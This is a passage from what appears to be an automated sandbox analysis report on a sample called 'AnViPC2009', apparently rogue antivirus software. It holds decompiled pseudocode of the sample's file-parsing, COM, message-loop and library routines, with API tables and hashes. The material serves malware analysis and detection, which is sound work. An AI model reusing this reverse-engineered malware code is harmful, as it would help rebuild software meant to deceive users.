                                                                                                                                                      									if( *_t95 == 0x2a &&  *((char*)(_t127 + _t122 - 0x302b)) == 0x2a && E0040A516(_t127 + _t122 - 0x302a, "*messages***", 0xb) == 0) {
                                                                                                                                                      										break;
                                                                                                                                                      									}
                                                                                                                                                      									if( *_t95 != 0x52 ||  *((char*)(_t127 + _t122 - 0x302b)) != 0x61 || E0040A516(_t127 + _t122 - 0x302a, 0x412580, 4) != 0) {
                                                                                                                                                      										_t122 = _t122 + 1;
                                                                                                                                                      										if(_t122 <= _v16 + 0xfffffff0) {
                                                                                                                                                      											continue;
                                                                                                                                                      										} else {
                                                                                                                                                      											L19:
                                                                                                                                                      											E004054B4( &_v4144, _v16 + _v12 - 0x10, 0, 0);
                                                                                                                                                      											_v8 = _v8 + 1;
                                                                                                                                                      											if(_v8 < 0x40) {
                                                                                                                                                      												goto L7;
                                                                                                                                                      											} else {
                                                                                                                                                      												if(_a4 != 0xffffffff) {
                                                                                                                                                      													goto L21;
                                                                                                                                                      												}
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      									goto L42;
                                                                                                                                                      								}
                                                                                                                                                      								_a4 = _t122 + _v12;
                                                                                                                                                      								goto L19;
                                                                                                                                                      							}
                                                                                                                                                      							L42:
                                                                                                                                                      							_t76 = E0040503B(_t95,  &_v4144);
                                                                                                                                                      							goto L43;
                                                                                                                                                      						}
                                                                                                                                                      						L21:
                                                                                                                                                      						asm("cdq");
                                                                                                                                                      						_t95 = 0;
                                                                                                                                                      						 *((intOrPtr*)(_t125 + 4)) = 0x20000;
                                                                                                                                                      						E004054B4( &_v4144, _a4, _t110, 0);
                                                                                                                                                      						_t75 = E0040A1C5( *((intOrPtr*)(_t125 + 4)) + 0x400);
                                                                                                                                                      						 *_t125 = _t75;
                                                                                                                                                      						if(_t75 != 0) {
                                                                                                                                                      							 *((char*)(_t75 +  *((intOrPtr*)(_t125 + 4)))) = 0;
                                                                                                                                                      							_t77 = E00405651( &_v4144, _t110,  *_t125,  *((intOrPtr*)(_t125 + 4)));
                                                                                                                                                      							_t104 = 0;
                                                                                                                                                      							 *((intOrPtr*)(_t125 + 4)) = _t77;
                                                                                                                                                      							if(_t77 > 0) {
                                                                                                                                                      								while(1) {
                                                                                                                                                      									_t79 =  *_t125;
                                                                                                                                                      									_t111 =  *((char*)(_t79 + _t95));
                                                                                                                                                      									_t95 = _t95 + 1;
                                                                                                                                                      									if(_t111 == 0) {
                                                                                                                                                      										goto L41;
                                                                                                                                                      									}
                                                                                                                                                      									if(_t111 != 0x5c) {
                                                                                                                                                      										if(_t111 == 0xd || _t111 == 0xa) {
                                                                                                                                                      											_t111 = 0xc;
                                                                                                                                                      										}
                                                                                                                                                      										goto L39;
                                                                                                                                                      									} else {
                                                                                                                                                      										_t116 =  *((char*)(_t79 + _t95)) - 0x22;
                                                                                                                                                      										if(_t116 == 0) {
                                                                                                                                                      											 *((char*)(_t79 + _t104)) = 0x22;
                                                                                                                                                      											goto L35;
                                                                                                                                                      										} else {
                                                                                                                                                      											_t117 = _t116 - 0x3a;
                                                                                                                                                      											if(_t117 == 0) {
                                                                                                                                                      												 *((char*)(_t79 + _t104)) = 0x5c;
                                                                                                                                                      												goto L35;
                                                                                                                                                      											} else {
                                                                                                                                                      												_t118 = _t117 - 0x12;
                                                                                                                                                      												if(_t118 == 0) {
                                                                                                                                                      													 *((char*)(_t79 + _t104)) = 0xa;
                                                                                                                                                      													goto L35;
                                                                                                                                                      												} else {
                                                                                                                                                      													_t119 = _t118 - 4;
                                                                                                                                                      													if(_t119 == 0) {
                                                                                                                                                      														 *((char*)(_t79 + _t104)) = 0xd;
                                                                                                                                                      														goto L35;
                                                                                                                                                      													} else {
                                                                                                                                                      														if(_t119 != 0) {
                                                                                                                                                      															L39:
                                                                                                                                                      															 *((char*)(_t79 + _t104)) = _t111;
                                                                                                                                                      														} else {
                                                                                                                                                      															 *((char*)(_t79 + _t104)) = 9;
                                                                                                                                                      															L35:
                                                                                                                                                      															_t95 = _t95 + 1;
                                                                                                                                                      														}
                                                                                                                                                      													}
                                                                                                                                                      												}
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      									_t104 = _t104 + 1;
                                                                                                                                                      									if(_t95 <  *((intOrPtr*)(_t125 + 4))) {
                                                                                                                                                      										continue;
                                                                                                                                                      									}
                                                                                                                                                      									goto L41;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      							L41:
                                                                                                                                                      							 *((char*)(_t104 +  *_t125)) = 0;
                                                                                                                                                      							 *((intOrPtr*)(_t125 + 4)) = _t104;
                                                                                                                                                      						}
                                                                                                                                                      						goto L42;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t76 = E0040503B(_t95,  &_v4144);
                                                                                                                                                      					}
                                                                                                                                                      					L43:
                                                                                                                                                      				} else {
                                                                                                                                                      					GetModuleFileNameA(0,  &_v1040, 0x400);
                                                                                                                                                      					_t76 = E0040A3B2(_t97,  &_v1040, 0x5c);
                                                                                                                                                      					if(_t76 != 0) {
                                                                                                                                                      						_t66 = _t76 + 1;
                                                                                                                                                      						goto L4;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _t76;
                                                                                                                                                      			}




























                                                                                                                                                      0x0040926c
                                                                                                                                                      0x0040926c
                                                                                                                                                      0x0040926c
                                                                                                                                                      0x00409274
                                                                                                                                                      0x00409278
                                                                                                                                                      0x0040927c
                                                                                                                                                      0x0040927f
                                                                                                                                                      0x00409281
                                                                                                                                                      0x00409288
                                                                                                                                                      0x0040928e
                                                                                                                                                      0x004092b5
                                                                                                                                                      0x004092b9
                                                                                                                                                      0x004092c5
                                                                                                                                                      0x004092dd
                                                                                                                                                      0x004092e4
                                                                                                                                                      0x004092f6
                                                                                                                                                      0x004092fa
                                                                                                                                                      0x004092fd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004092fe
                                                                                                                                                      0x0040930e
                                                                                                                                                      0x00409313
                                                                                                                                                      0x00409328
                                                                                                                                                      0x0040932d
                                                                                                                                                      0x00409333
                                                                                                                                                      0x00409339
                                                                                                                                                      0x0040933b
                                                                                                                                                      0x0040933b
                                                                                                                                                      0x00409345
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040936c
                                                                                                                                                      0x00409397
                                                                                                                                                      0x0040939d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040939f
                                                                                                                                                      0x004093a9
                                                                                                                                                      0x004093be
                                                                                                                                                      0x004093c3
                                                                                                                                                      0x004093ca
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004093d0
                                                                                                                                                      0x004093d4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004093d4
                                                                                                                                                      0x004093ca
                                                                                                                                                      0x0040939d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040936c
                                                                                                                                                      0x004093a6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004093a6
                                                                                                                                                      0x00409496
                                                                                                                                                      0x0040949c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004094a1
                                                                                                                                                      0x004093da
                                                                                                                                                      0x004093dd
                                                                                                                                                      0x004093de
                                                                                                                                                      0x004093e9
                                                                                                                                                      0x004093f0
                                                                                                                                                      0x004093fe
                                                                                                                                                      0x00409403
                                                                                                                                                      0x00409407
                                                                                                                                                      0x00409410
                                                                                                                                                      0x0040941e
                                                                                                                                                      0x00409423
                                                                                                                                                      0x00409427
                                                                                                                                                      0x0040942a
                                                                                                                                                      0x0040942c
                                                                                                                                                      0x0040942c
                                                                                                                                                      0x0040942e
                                                                                                                                                      0x00409432
                                                                                                                                                      0x00409435
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040943a
                                                                                                                                                      0x0040947a
                                                                                                                                                      0x00409483
                                                                                                                                                      0x00409483
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040943c
                                                                                                                                                      0x00409440
                                                                                                                                                      0x00409443
                                                                                                                                                      0x00409470
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409445
                                                                                                                                                      0x00409445
                                                                                                                                                      0x00409448
                                                                                                                                                      0x0040946a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040944a
                                                                                                                                                      0x0040944a
                                                                                                                                                      0x0040944d
                                                                                                                                                      0x00409464
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040944f
                                                                                                                                                      0x0040944f
                                                                                                                                                      0x00409452
                                                                                                                                                      0x0040945e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409454
                                                                                                                                                      0x00409456
                                                                                                                                                      0x00409484
                                                                                                                                                      0x00409484
                                                                                                                                                      0x00409458
                                                                                                                                                      0x00409458
                                                                                                                                                      0x00409474
                                                                                                                                                      0x00409474
                                                                                                                                                      0x00409474
                                                                                                                                                      0x00409456
                                                                                                                                                      0x00409452
                                                                                                                                                      0x0040944d
                                                                                                                                                      0x00409448
                                                                                                                                                      0x00409443
                                                                                                                                                      0x00409487
                                                                                                                                                      0x0040948b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040948b
                                                                                                                                                      0x0040942c
                                                                                                                                                      0x0040948d
                                                                                                                                                      0x0040948f
                                                                                                                                                      0x00409493
                                                                                                                                                      0x00409493
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004092e6
                                                                                                                                                      0x004092ec
                                                                                                                                                      0x004092ec
                                                                                                                                                      0x004094a2
                                                                                                                                                      0x00409290
                                                                                                                                                      0x00409298
                                                                                                                                                      0x004092a7
                                                                                                                                                      0x004092ae
                                                                                                                                                      0x004092b4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004092b4
                                                                                                                                                      0x004092ae
                                                                                                                                                      0x004094a5

                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000400,?,0000005C,00414C88,?,004098C5,?,C:\Users\user\Desktop\Endermanch@AnViPC2009.exe,0040D489,C:\Users\user\Desktop\Endermanch@AnViPC2009.exe), ref: 00409298
                                                                                                                                                        • Part of subcall function 00404FA3: SetFilePointer.KERNELBASE(00020000,00000000,00000000,00000001,?,?,?,?,0040A7D3,?,?,00405524,?,?), ref: 00404FBA
                                                                                                                                                        • Part of subcall function 00404FA3: GetLastError.KERNEL32(?,0040A7D3,?,?,00405524,?,?), ref: 00404FC7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$ErrorLastModuleNamePointer
                                                                                                                                                      • String ID: *messages***$@$a
                                                                                                                                                      • API String ID: 1624790276-2848287086
                                                                                                                                                      • Opcode ID: 5c6ef8d1750c96ea0342bd8aa21a90585a63e21354e8867ff1f3afbc563d9f88
                                                                                                                                                      • Instruction ID: c2091fff8c98c9158d4c6855c82bddaf78b5c49a36df1a17a4426aebc4a45ec3
                                                                                                                                                      • Opcode Fuzzy Hash: 5c6ef8d1750c96ea0342bd8aa21a90585a63e21354e8867ff1f3afbc563d9f88
                                                                                                                                                      • Instruction Fuzzy Hash: 77612471904244AEEB31DF64CC84FAF7BA89B45304F1081BFE945B61E3CA788E46CB19
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1533 40a996-40a9c2 OleInitialize CoCreateInstance 1534 40a9c8-40a9e3 1533->1534 1535 40aa8e-40aa98 OleUninitialize 1533->1535 1538 40a9f2-40a9f5 1534->1538 1539 40a9e5-40a9ee 1534->1539 1540 40aa03-40aa24 call 40a450 call 4076f9 1538->1540 1541 40a9f7-40a9ff 1538->1541 1539->1538 1546 40aa36-40aa49 1540->1546 1547 40aa26-40aa32 1540->1547 1541->1540 1549 40aa85-40aa8a 1546->1549 1550 40aa4b-40aa72 MultiByteToWideChar 1546->1550 1547->1546 1549->1535 1551 40aa76-40aa78 1550->1551 1552 40aa7a 1551->1552 1553 40aa7c-40aa81 1551->1553 1552->1553 1553->1549
                                                                                                                                                      C-Code - Quality: 55%
                                                                                                                                                      			E0040A996(intOrPtr _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                      				void* _v8;
                                                                                                                                                      				void* _v12;
                                                                                                                                                      				short _v532;
                                                                                                                                                      				char _v1556;
                                                                                                                                                      				char* _t34;
                                                                                                                                                      				intOrPtr* _t36;
                                                                                                                                                      				intOrPtr* _t38;
                                                                                                                                                      				intOrPtr* _t44;
                                                                                                                                                      				intOrPtr* _t46;
                                                                                                                                                      				intOrPtr* _t50;
                                                                                                                                                      				intOrPtr* _t52;
                                                                                                                                                      				intOrPtr* _t54;
                                                                                                                                                      				intOrPtr* _t56;
                                                                                                                                                      				intOrPtr* _t58;
                                                                                                                                                      				int _t60;
                                                                                                                                                      
                                                                                                                                                      				_t60 = 0;
                                                                                                                                                      				__imp__OleInitialize(0);
                                                                                                                                                      				_t34 =  &_v8;
                                                                                                                                                      				__imp__CoCreateInstance(0x4128f8, 0, 1, 0x412848, _t34); // executed
                                                                                                                                                      				if(_t34 >= 0) {
                                                                                                                                                      					_t36 = _v8;
                                                                                                                                                      					 *((intOrPtr*)( *_t36 + 0x50))(_t36, _a4);
                                                                                                                                                      					_t38 = _v8;
                                                                                                                                                      					 *((intOrPtr*)( *_t38 + 0x1c))(_t38, _a12);
                                                                                                                                                      					if(_a16 != 0) {
                                                                                                                                                      						_t58 = _v8;
                                                                                                                                                      						 *((intOrPtr*)( *_t58 + 0x44))(_t58, _a16, 0);
                                                                                                                                                      					}
                                                                                                                                                      					if(_a20 != _t60) {
                                                                                                                                                      						_t56 = _v8;
                                                                                                                                                      						 *((intOrPtr*)( *_t56 + 0x2c))(_t56, _a20);
                                                                                                                                                      					}
                                                                                                                                                      					E0040A450( &_v1556, _a4);
                                                                                                                                                      					E004076F9( &_v1556);
                                                                                                                                                      					if(_v1556 != _t60) {
                                                                                                                                                      						_t54 = _v8;
                                                                                                                                                      						 *((intOrPtr*)( *_t54 + 0x24))(_t54,  &_v1556);
                                                                                                                                                      					}
                                                                                                                                                      					_t44 = _v8;
                                                                                                                                                      					_push( &_v12);
                                                                                                                                                      					_push(0x4128e8);
                                                                                                                                                      					_push(_t44);
                                                                                                                                                      					if( *((intOrPtr*)( *_t44))() >= 0) {
                                                                                                                                                      						MultiByteToWideChar(_t60, _t60, _a8, 0xffffffff,  &_v532, 0x104);
                                                                                                                                                      						_t50 = _v12;
                                                                                                                                                      						_push(1);
                                                                                                                                                      						_push( &_v532);
                                                                                                                                                      						_push(_t50); // executed
                                                                                                                                                      						if( *((intOrPtr*)( *_t50 + 0x18))() >= 0) {
                                                                                                                                                      							_t60 = 1;
                                                                                                                                                      						}
                                                                                                                                                      						_t52 = _v12;
                                                                                                                                                      						 *((intOrPtr*)( *_t52 + 8))(_t52);
                                                                                                                                                      					}
                                                                                                                                                      					_t46 = _v8;
                                                                                                                                                      					 *((intOrPtr*)( *_t46 + 8))(_t46);
                                                                                                                                                      				}
                                                                                                                                                      				"0+&u@uxv"();
                                                                                                                                                      				return _t60;
                                                                                                                                                      			}


















                                                                                                                                                      0x0040a9a0
                                                                                                                                                      0x0040a9a3
                                                                                                                                                      0x0040a9a9
                                                                                                                                                      0x0040a9ba
                                                                                                                                                      0x0040a9c2
                                                                                                                                                      0x0040a9c8
                                                                                                                                                      0x0040a9d1
                                                                                                                                                      0x0040a9d4
                                                                                                                                                      0x0040a9dd
                                                                                                                                                      0x0040a9e3
                                                                                                                                                      0x0040a9e5
                                                                                                                                                      0x0040a9ef
                                                                                                                                                      0x0040a9ef
                                                                                                                                                      0x0040a9f5
                                                                                                                                                      0x0040a9f7
                                                                                                                                                      0x0040aa00
                                                                                                                                                      0x0040aa00
                                                                                                                                                      0x0040aa0d
                                                                                                                                                      0x0040aa19
                                                                                                                                                      0x0040aa24
                                                                                                                                                      0x0040aa26
                                                                                                                                                      0x0040aa33
                                                                                                                                                      0x0040aa33
                                                                                                                                                      0x0040aa36
                                                                                                                                                      0x0040aa3e
                                                                                                                                                      0x0040aa3f
                                                                                                                                                      0x0040aa44
                                                                                                                                                      0x0040aa49
                                                                                                                                                      0x0040aa5e
                                                                                                                                                      0x0040aa64
                                                                                                                                                      0x0040aa69
                                                                                                                                                      0x0040aa71
                                                                                                                                                      0x0040aa72
                                                                                                                                                      0x0040aa78
                                                                                                                                                      0x0040aa7a
                                                                                                                                                      0x0040aa7a
                                                                                                                                                      0x0040aa7c
                                                                                                                                                      0x0040aa82
                                                                                                                                                      0x0040aa82
                                                                                                                                                      0x0040aa85
                                                                                                                                                      0x0040aa8b
                                                                                                                                                      0x0040aa8b
                                                                                                                                                      0x0040aa8e
                                                                                                                                                      0x0040aa98

                                                                                                                                                      APIs
                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 0040A9A3
                                                                                                                                                      • CoCreateInstance.OLE32(004128F8,00000000,00000001,00412848,?), ref: 0040A9BA
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 0040AA5E
                                                                                                                                                      • OleUninitialize.OLE32 ref: 0040AA8E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharCreateInitializeInstanceMultiUninitializeWide
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2968213145-0
                                                                                                                                                      • Opcode ID: fb9c586c9fb5440b83fb889942a5213d7322b8fbc96e1bda4fd449a9188eb5a3
                                                                                                                                                      • Instruction ID: 3edc598eddc15014abc051cdaf2913f0e6c1832dde95bd65b695a039898fa7dd
                                                                                                                                                      • Opcode Fuzzy Hash: fb9c586c9fb5440b83fb889942a5213d7322b8fbc96e1bda4fd449a9188eb5a3
                                                                                                                                                      • Instruction Fuzzy Hash: 9731F875A00209AFDF00DFA0C988E9A7779EF88304F1445A9B505EB291C775DEA1DF64
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1554 40a806-40a81f PeekMessageA 1555 40a821-40a83c GetMessageA TranslateMessage DispatchMessageA 1554->1555 1556 40a842-40a844 1554->1556 1555->1556
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040A806() {
                                                                                                                                                      				struct tagMSG _v32;
                                                                                                                                                      				int _t6;
                                                                                                                                                      				long _t12;
                                                                                                                                                      
                                                                                                                                                      				_t6 = PeekMessageA( &_v32, 0, 0, 0, 0); // executed
                                                                                                                                                      				if(_t6 != 0) {
                                                                                                                                                      					GetMessageA( &_v32, 0, 0, 0);
                                                                                                                                                      					TranslateMessage( &_v32);
                                                                                                                                                      					_t12 = DispatchMessageA( &_v32); // executed
                                                                                                                                                      					return _t12;
                                                                                                                                                      				}
                                                                                                                                                      				return _t6;
                                                                                                                                                      			}






                                                                                                                                                      0x0040a817
                                                                                                                                                      0x0040a81f
                                                                                                                                                      0x0040a828
                                                                                                                                                      0x0040a832
                                                                                                                                                      0x0040a83c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040a83c
                                                                                                                                                      0x0040a844

                                                                                                                                                      APIs
                                                                                                                                                      • PeekMessageA.USER32(0040A7D3,00000000,00000000,00000000,00000000), ref: 0040A817
                                                                                                                                                      • GetMessageA.USER32 ref: 0040A828
                                                                                                                                                      • TranslateMessage.USER32(?), ref: 0040A832
                                                                                                                                                      • DispatchMessageA.USER32 ref: 0040A83C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Message$DispatchPeekTranslate
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4217535847-0
                                                                                                                                                      • Opcode ID: 6f758e3524847f8367fe4475849f677d5cd065856652c1f6fd865f23679596fb
                                                                                                                                                      • Instruction ID: d2dbb09323ad63b434658416e01ed091b2a32e89b97b261240c84389225ddb4f
                                                                                                                                                      • Opcode Fuzzy Hash: 6f758e3524847f8367fe4475849f677d5cd065856652c1f6fd865f23679596fb
                                                                                                                                                      • Instruction Fuzzy Hash: BBE0ED72C0216AA7CB106BE5DD0CDDF7FACEE052517008061B505E2025E678D515C7F4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 76%
                                                                                                                                                      			E00404FA3(void* __ecx, signed int __edx) {
                                                                                                                                                      				long _v8;
                                                                                                                                                      				long _t8;
                                                                                                                                                      				signed int _t11;
                                                                                                                                                      				signed int _t17;
                                                                                                                                                      				long _t20;
                                                                                                                                                      				void* _t23;
                                                                                                                                                      
                                                                                                                                                      				_t17 = __edx;
                                                                                                                                                      				_push(__ecx);
                                                                                                                                                      				_v8 = _v8 & 0x00000000;
                                                                                                                                                      				_t23 = __ecx;
                                                                                                                                                      				_t8 = SetFilePointer( *(__ecx + 4), 0,  &_v8, 1); // executed
                                                                                                                                                      				_t20 = _t8;
                                                                                                                                                      				if(_t20 != 0xffffffff || GetLastError() == 0) {
                                                                                                                                                      					L4:
                                                                                                                                                      					asm("cdq");
                                                                                                                                                      					_t11 = E00401030(_v8, _t17, 0, 1) + _t20;
                                                                                                                                                      					asm("adc edx, ecx");
                                                                                                                                                      				} else {
                                                                                                                                                      					if( *((char*)(_t23 + 0x14)) == 0) {
                                                                                                                                                      						_t11 = _t17 | 0xffffffff;
                                                                                                                                                      					} else {
                                                                                                                                                      						E0040332E(0x414c7c, _t23 + 0x17);
                                                                                                                                                      						goto L4;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _t11;
                                                                                                                                                      			}









                                                                                                                                                      0x00404fa3
                                                                                                                                                      0x00404fa6
                                                                                                                                                      0x00404fa7
                                                                                                                                                      0x00404fb3
                                                                                                                                                      0x00404fba
                                                                                                                                                      0x00404fc0
                                                                                                                                                      0x00404fc5
                                                                                                                                                      0x00404fe5
                                                                                                                                                      0x00404fea
                                                                                                                                                      0x00404ff6
                                                                                                                                                      0x00404ff8
                                                                                                                                                      0x00404fd1
                                                                                                                                                      0x00404fd5
                                                                                                                                                      0x00405001
                                                                                                                                                      0x00404fd7
                                                                                                                                                      0x00404fe0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404fe0
                                                                                                                                                      0x00404fd5
                                                                                                                                                      0x00404ffd

                                                                                                                                                      APIs
                                                                                                                                                      • SetFilePointer.KERNELBASE(00020000,00000000,00000000,00000001,?,?,?,?,0040A7D3,?,?,00405524,?,?), ref: 00404FBA
                                                                                                                                                      • GetLastError.KERNEL32(?,0040A7D3,?,?,00405524,?,?), ref: 00404FC7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                                      • String ID: |LA
                                                                                                                                                      • API String ID: 2976181284-4290591017
                                                                                                                                                      • Opcode ID: 184dc8012a1ce1d9010cccb536a5defb8f39e0ea6c163ee1179f643669fae23a
                                                                                                                                                      • Instruction ID: c2820b33c8eafdce036db126d9e69f7ce15e24a47886ce0b202afd87eabc9474
                                                                                                                                                      • Opcode Fuzzy Hash: 184dc8012a1ce1d9010cccb536a5defb8f39e0ea6c163ee1179f643669fae23a
                                                                                                                                                      • Instruction Fuzzy Hash: 2EF0F6767402017BE724966A9D0BFDA36ADCBC0725F24423AB712E22D0DAB89D009268
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E004116EF(struct HINSTANCE__** __ecx) {
                                                                                                                                                      				struct HINSTANCE__* _t3;
                                                                                                                                                      				intOrPtr* _t4;
                                                                                                                                                      				struct HINSTANCE__** _t11;
                                                                                                                                                      				struct HINSTANCE__* _t12;
                                                                                                                                                      
                                                                                                                                                      				_t11 = __ecx;
                                                                                                                                                      				_t3 =  *__ecx;
                                                                                                                                                      				if(_t3 != 0) {
                                                                                                                                                      					FreeLibrary(_t3); // executed
                                                                                                                                                      				}
                                                                                                                                                      				_t12 =  *(_t11 + 4);
                                                                                                                                                      				if(_t12 != 0) {
                                                                                                                                                      					FreeLibrary(_t12);
                                                                                                                                                      				}
                                                                                                                                                      				_t4 =  *0x41fff0; // 0x768ac100
                                                                                                                                                      				return  *((intOrPtr*)( *_t4 + 8))(_t4);
                                                                                                                                                      			}







                                                                                                                                                      0x004116f0
                                                                                                                                                      0x004116f2
                                                                                                                                                      0x004116fd
                                                                                                                                                      0x00411700
                                                                                                                                                      0x00411700
                                                                                                                                                      0x00411702
                                                                                                                                                      0x00411707
                                                                                                                                                      0x0041170a
                                                                                                                                                      0x0041170a
                                                                                                                                                      0x0041170c
                                                                                                                                                      0x00411719

                                                                                                                                                      APIs
                                                                                                                                                      • FreeLibrary.KERNELBASE(00000000,00000000,C:\Users\user\Desktop\Endermanch@AnViPC2009.exe,0040D4FA), ref: 00411700
                                                                                                                                                      • FreeLibrary.KERNELBASE(?,00000000,C:\Users\user\Desktop\Endermanch@AnViPC2009.exe,0040D4FA), ref: 0041170A
                                                                                                                                                      Strings
                                                                                                                                                      • C:\Users\user\Desktop\Endermanch@AnViPC2009.exe, xrefs: 004116EF
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
